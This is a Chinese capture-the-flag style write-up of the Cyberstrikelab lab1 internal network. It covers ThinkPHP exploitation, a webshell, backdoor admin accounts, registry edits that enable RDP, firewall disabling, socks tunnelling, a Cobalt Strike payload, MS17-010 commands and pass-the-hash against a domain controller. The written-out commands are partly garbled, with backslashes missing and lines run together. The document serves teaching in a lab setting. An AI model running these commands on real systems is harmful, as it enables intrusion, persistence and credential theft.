内网基础-Cyberstrikelab靶场lab1

admin
admin
admin
139120
文章
114
评论
2025年4月2日22:29:53评论16 views字数 1729阅读5分45秒阅读模式
内网基础-Cyberstrikelab靶场lab1
内网基础-Cyberstrikelab靶场lab1
内网基础-Cyberstrikelab靶场lab1
鼎新安全
don't give up and don't give in !

内网基础-Cyberstrikelab靶场lab1

信息收集

内网基础-Cyberstrikelab靶场lab1内网基础-Cyberstrikelab靶场lab1这里我使用fscan扫描,发现thinkphp漏洞!  

漏洞利用

内网基础-Cyberstrikelab靶场lab1内网基础-Cyberstrikelab靶场lab1

  我们先写个shell!   直接一句话木马!

内网基础-Cyberstrikelab靶场lab1内网基础-Cyberstrikelab靶场lab1

  flag在c盘下!

内网基础-Cyberstrikelab靶场lab1

这里使用蚁剑连接!发现是system权限!我们添加用户、添加到管理员组、然后注册表开启3389端口!  

Get 第一台机器

net user xtk 123@abc /addnet localgroup Administrators xtk /addREG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

这里可以禁用防火墙:

netsh advfirewall set allprofiles state off

如果对方开启了身份验证,我们关掉即可!

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
内网基础-Cyberstrikelab靶场lab1
连接成功!  

内网基础-Cyberstrikelab靶场lab1

内网基础-Cyberstrikelab靶场lab1

  这里发现机器的公网IP为192.168.10.10,内网IP为192.168.20.10!   既然存在公网IP,我们做一个正向代理即可!   使用ew代理开启socks5隧道!   我们先把第一台机器上线CS

内网基础-Cyberstrikelab靶场lab1

内网基础-Cyberstrikelab靶场lab1

  使用python开启一个虚拟服务器!   记得导入vpn文件!获取到模拟vps地址IP!

内网基础-Cyberstrikelab靶场lab1

  下载shell.exe!   运行即可上线成功!   我们这里上传ew,建立正向连接!  
shell.ew_for_win.exe -s ssocksd -l 1080

内网基础-Cyberstrikelab靶场lab1

  这里把流量带到1080端口上!

内网基础-Cyberstrikelab靶场lab1

  在linux机器上编辑proxychains配置文件!   然后测试:  
shellproxychains4 curl 127.0.0.1

回显正常即可!  

Get 第三台机器

  因为在第一台机器中扫描到了192.168.20.30存在ms17-010,这里我们可以把cs的第一台机器会话派生到msf上!这里我就直接利用ms17漏洞的命令执行了!  

攻击ip是192.168.20.30

内网基础-Cyberstrikelab靶场lab1

set COMMAND 'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'set COMMAND net user tk 123@abc /addset COMMAND net localgroup Administrators tk /addset COMMAND netsh firewall set opmode disableset COMMAND type C:\flag.txt
  这里记得开启3389、创建用户、加入到管理员组、关闭防火墙、读取flag!   在linux上使用远程rdp连接192.168.10.10,也就是第一台机器!  
rdesktop 192.168.10.10
  然后,我们就可以直接在192.168.10.10机器内开启远程连接!连接192.168.20.30   我们再给第三台机器上线cs!

内网基础-Cyberstrikelab靶场lab1

  这里创建监听192.168.10.10,生成一个马子!   可以先上传到192.168.10.10上,然后直接复制到192.168.20.30上!运行上线即可!

内网基础-Cyberstrikelab靶场lab1

  这里可以看到,我这里有很多机器,主要是hashdump需要管理员才能执行!所以这里获取到192.168.20.30后记得提权!这里使用uac提权成功!

内网基础-Cyberstrikelab靶场lab1

这里可以发现,第三台机器是域控服务器!我们直接打PTH哈希传递即可!  

我们使用 Impacket的psexec.py进行攻击!  

Get 第二台机器

直接PTH攻击!

内网基础-Cyberstrikelab靶场lab1拿到flag2!

内网基础-Cyberstrikelab靶场lab1
END
内网基础-Cyberstrikelab靶场lab1

注:鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(鼎新安全):内网基础-Cyberstrikelab靶场lab1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月2日22:29:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网基础-Cyberstrikelab靶场lab1https://cn-sec.com/archives/3907226.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息